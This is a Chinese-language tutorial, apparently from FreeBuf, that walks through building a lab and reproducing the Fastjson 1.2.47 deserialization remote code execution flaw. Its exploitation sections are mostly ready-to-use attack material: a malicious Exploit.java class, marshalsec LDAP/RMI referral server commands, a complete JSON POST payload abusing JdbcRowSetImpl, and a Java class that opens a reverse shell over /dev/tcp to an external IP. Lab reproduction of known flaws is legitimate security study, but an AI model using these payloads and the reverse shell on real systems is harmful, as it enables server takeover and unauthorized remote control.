一、搭建环境:
第一种:Docker一键拉取环境
htttps://github.com/vulhub/vulhub/tree/master/fastjson/1.2.47-rce
第二种:tomacat搭建:
1、搭建tomcat环境
首先去tomcat官网下载tomcat
https://mirrors.tuna.tsinghua.edu.cn/apache/tomcat/tomcat-9/v9.0.48/bin/apache-tomcat-9.0.48.tar.gz
2、将此压缩包复制到我的linux服务器上解压
tar zxvf apache-tomcat-9.0.48.tar.gz
3、把文件放在tomcat9文件夹,授予tomcat9这个文件夹777权限
cd /usr/local
mkdir tomcat9
在apache-tomcat-9.0.48 所在目录下执行
cp -r apache-tomcat-9.0.48/* /usr/local/tomcat9/
cd /usr/local/
chmod -R 777 tomcat9
4、安装java环境
上传jdk压缩包文件到服务器/usr/java目录下
tar zxvf jdk-8u181-linux-x64.tar.gz
配置JDK版本及环境变量
vi /etc/profile
#java
export JAVA_HOME=/usr/java/jdk1.8.0_102
export PATH=$JAVA_HOME/bin:$PATH
export CLASSPATH=.:$JAVA_HOME/lib/dt.jar:$JAVA_HOME/lib
source /etc/profile
java -version
5、启动tomcat
进入tomcat9下的bin目录
./catalina.sh start
我这里因为8080端口被占用了,改了下tomcat端口到8088了,改端口的话在tomcat目录下的conf文件。
6、最后复制fastjson1.2.47到webapps文件夹下,环境即搭建成功。
##在webapps下新建fastjson目录
mkdir fastjson
在fastjson目录下执行
cp -r fastjson/* /usr/local/tomcat9//webapps/fastjson
成功
**
二、CentOS安装maven
1、安装 wget 命令:
yum -y install wget
2、下载maven安装包
wget http://mirrors.cnnic.cn/apache/maven/maven-3/3.5.4/binaries/apache-maven-3.5.4-bin.tar.gz
3.解压maven安装包
```bash
tar -zxvf apache-maven-3.5.4-bin.tar.gz
4.配置maven:
vim /etc/profile
在配置文件配置中加上:
export MAVEN_HOME=/root/apache-maven-3.5.4 (这个目录换成你的 maven 解压后的文件所在目录)
export PATH=$MAVEN_HOME/bin:$PATH
5、让文件生效,刷新配置文件 :
source /etc/profile
6.查看maven 版本:
mvn -version
# 或者
mvn -v
**
三、【漏洞利用】漏洞利用
【基础知识】
反序列化常用的两种利用方式,一种是基于rmi,一种是基于ldap。
RMI是一种行为,指的是Java远程方法调用。
JNDI是一个接口,在这个接口下会有多种目录系统服务的实现,通过名称等去找到相关的对象,并把它下载到客户端中来。
ldap指轻量级目录访问协议。
具体可参考https://xz.aliyun.com/t/7079
存在java版本限制:
基于rmi的利用方式:适用jdk版本:JDK 6u132, JDK 7u131, JDK 8u121之前。
在jdk8u122的时候,加入了反序列化白名单的机制,关闭了rmi远程加载代码。
基于ldap的利用方式:适用jdk版本:JDK 11.0.1、8u191、7u201、6u211之前。
在Java 8u191更新中,Oracle对LDAP向量设置了相同的限制,并发布了CVE-2018-3149,关闭了JNDI远程类加载。
可以看到ldap的利用范围是比rmi要大的,实战情况下推荐使用ldap方法进行利用。
【漏洞复现】
1、拿个来自斯文大佬的EXP
**
Exploit:
import java.io.BufferedReader;
import java.io.InputStream;
import java.io.InputStreamReader;
public class Exploit{
public Exploit() throws Exception {
Process p = Runtime.getRuntime().exec("touch /tmp/fastjson.test");
InputStream is = p.getInputStream();
BufferedReader reader = new BufferedReader(new InputStreamReader(is));
String line;
while((line = reader.readLine()) != null) {
System.out.println(line);
}
p.waitFor();
is.close();
reader.close();
p.destroy();
}
public static void main(String[] args) throws Exception {
}
}
上述代码保存为Exploit.java
然后运行javac Exploit.java编译
生成Exploit.class文件上传到VP-S上
2、在VP-S上Exploit.class目录下运行
python3 -m http.server 7000
使用python搭建一个临时的web服务
Ps:此步是为了接收LDAP服务重定向请求,需要在payload的目录下开启此web服务,这样才可以访问到payload文件
3、在本地启动rmi服务器,这里推荐github上的一个项目marshalsec
(也可以直接用打包好的jar包在文末公众号回复获取:marshalsec-0.0.3-SNAPSHOT.jar )
安装mvn
https://github.com/mbechler/marshalsec
需要用maven进行生成jar包,进入marshalsec目录后
git clone https://github.com/mbechler/marshalsec.git
cd marshalse
mvn clean package -Dmaven.test.skip=true
或者
mvn clean package -DskipTests
这一步可能会报错一般是java环境变量没设置好
我重装了下JDK就好了
https://blog.csdn.net/szgyunyun/article/details/118081356
4、之后利用marshalsec,启动ldap服务
LDAP:
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://192.168.71.1:7000/#TouchFile" 9999
##这里很尴尬文章写了一半我VP-S到期了,换成本地了http://192.168.71.1:7000/#TouchFile就是本地起的web服务。
或者
RMI:
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://192.168.71.1/#TouchFile" 9999
5、查看一下靶机源码,发现参数name和age,构造一下,回显正常,
真实环境中这些都是目标机自带的,找到提交json的地方构造poc即可
POST / HTTP/1.1
Host: 192.168.71.128:8090
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Content-Type: application/json
Connection: close
Content-Length: 19
{name:"1",age:"20"}
6、上poc
POST / HTTP/1.1
Host: 192.168.71.128:8090
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
Accept:*/*
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/json
Upgrade-Insecure-Requests: 1
Content-Length: 257
{
"a":{
"@type":"java.lang.Class",
"val":"com.sun.rowset.JdbcRowSetImpl"
},
"b":{
"@type":"com.sun.rowset.JdbcRowSetImpl",
"dataSourceName":"ldap://192.168.71.1:9999/Exploit",
"autoCommit":true
}
}
这边已经监听到了
到docker里边去看一下
docker exec -it d29ba4bb5ca1 /bin/bash
**
四、反弹shell
**
import java.io.BufferedReader;
import java.io.InputStream;
import java.io.InputStreamReader;
public class shell{
public shell() throws Exception {
Process p = Runtime.getRuntime().exec(new String[]{"/bin/bash","-c","exec 5<>/dev/tcp/139.9.xxx.xxx/8888;cat <&5 | while read line; do $line 2>&5 >&5; done"});
InputStream is = p.getInputStream();
BufferedReader reader = new BufferedReader(new InputStreamReader(is));
String line;
while((line = reader.readLine()) != null) {
System.out.println(line);
}
p.waitFor();
is.close();
reader.close();
p.destroy();
}
public static void main(String[] args) throws Exception {
}
}
微信公众号欢迎关注,回复“marshalsec”获取打包好的marshalsec-0.0.3-SNAPSHOT.jar
来源:freebuf.com 2021-06-30 09:04:23 by: 那酒不要留123
请登录后发表评论
注册